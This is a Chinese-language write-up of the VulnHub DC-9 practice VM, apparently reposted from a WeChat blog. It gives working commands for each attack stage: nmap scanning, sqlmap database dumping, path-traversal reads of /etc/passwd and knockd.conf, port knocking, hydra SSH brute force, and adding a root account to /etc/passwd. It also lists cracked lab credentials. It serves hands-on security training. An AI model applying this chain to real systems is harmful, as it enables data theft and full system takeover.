vulnhub之DC9的实践

  • A+
所属分类:安全文章

本周末实践的是vulnhub的DC9镜像,这个稍有难度,参考了一些别人的writeup,

下载地址,https://download.vulnhub.com/dc/DC-9.zip,

用workstation导入成功,且能直接扫描出地址,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之DC9的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.132,

vulnhub之DC9的实践

注意ssh的状态是filtered,这个根据经验大概率是开了端口敲门,

先访问http看看,看到search页面有个输入框,试试有没有SQL注入漏洞,

vulnhub之DC9的实践

直接在界面上框里输入是测不出来的,改用Burp Suite测就出来了,

vulnhub之DC9的实践

效果是这样的,

vulnhub之DC9的实践

这就可以上sqlmap了,需要把Burp Suite抓到的post请求保存下来给sqlmap用,

vulnhub之DC9的实践

先看看都有哪些数据库,sudo sqlmap -r post.txt --dbs,

主要是users和Staff,

对Staff进行脱库,sudo sqlmap -r post.txt -D Staff --dump-all,

vulnhub之DC9的实践

密码是md5的,找个在线的解一下,

vulnhub之DC9的实践

这就得到了admin/transorbital1,登录http,

vulnhub之DC9的实践

提示文件不存在,可猜测存在文件包含漏洞,测一下还真有,

http://192.168.137.132/welcome.php?file=../../../../../../../etc/passwd,

vulnhub之DC9的实践

到这里走不下去了,再回到sqlmap,脱另一个数据库users,

sudo sqlmap -r post.txt -D users --dump-all,

vulnhub之DC9的实践

这么些用户名密码是可以用来做ssh爆破的,用户名保存到user.txt,密码保存到passwd.txt,

但是有个问题,ssh的状态是filtered,猜测是开了端口敲门的,先要把门打开,这就用到了上面测试出来的文件包含漏洞了,读取到端口敲门的配置,

http://192.168.137.132/welcome.php?file=../../../../../../../etc/knockd.conf,

vulnhub之DC9的实践

kali攻击机上安装knockd,sudo apt install knockd,

把门敲开,sudo knock 192.168.137.132 7469 8475 9842,

这就可以爆破ssh了,sudo hydra -L user.txt -P passwd.txt 192.168.137.132 ssh,

vulnhub之DC9的实践

这里爆破出来三组可登录的账号密码,经过尝试,janitor/Ilovepeepee有用,能从登录目录下找到另一个密码文件,

vulnhub之DC9的实践

把新找到的密码加入passwd.txt,继续爆破,

vulnhub之DC9的实践

这次新爆破出来一组可登录的账号密码,fredf/B4-Tru3-001,

登录查看发现/opt/devstuff/dist/test/test可root权限运行,

而且发现/opt/devstuff/dist/test/test能够给文件添加内容,

这就可以走添加新账户的路子了,

sudo openssl passwd -1 -salt hacker password,

echo 'hacker:$1$hacker$9MeWOdvz78rHYG01HSLfr/:0:0::/root:/bin/bash' >> /tmp/passwd,

sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd,

切换到新添加的账户,su hacker,是root,没问题,

vulnhub之DC9的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之DC9的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: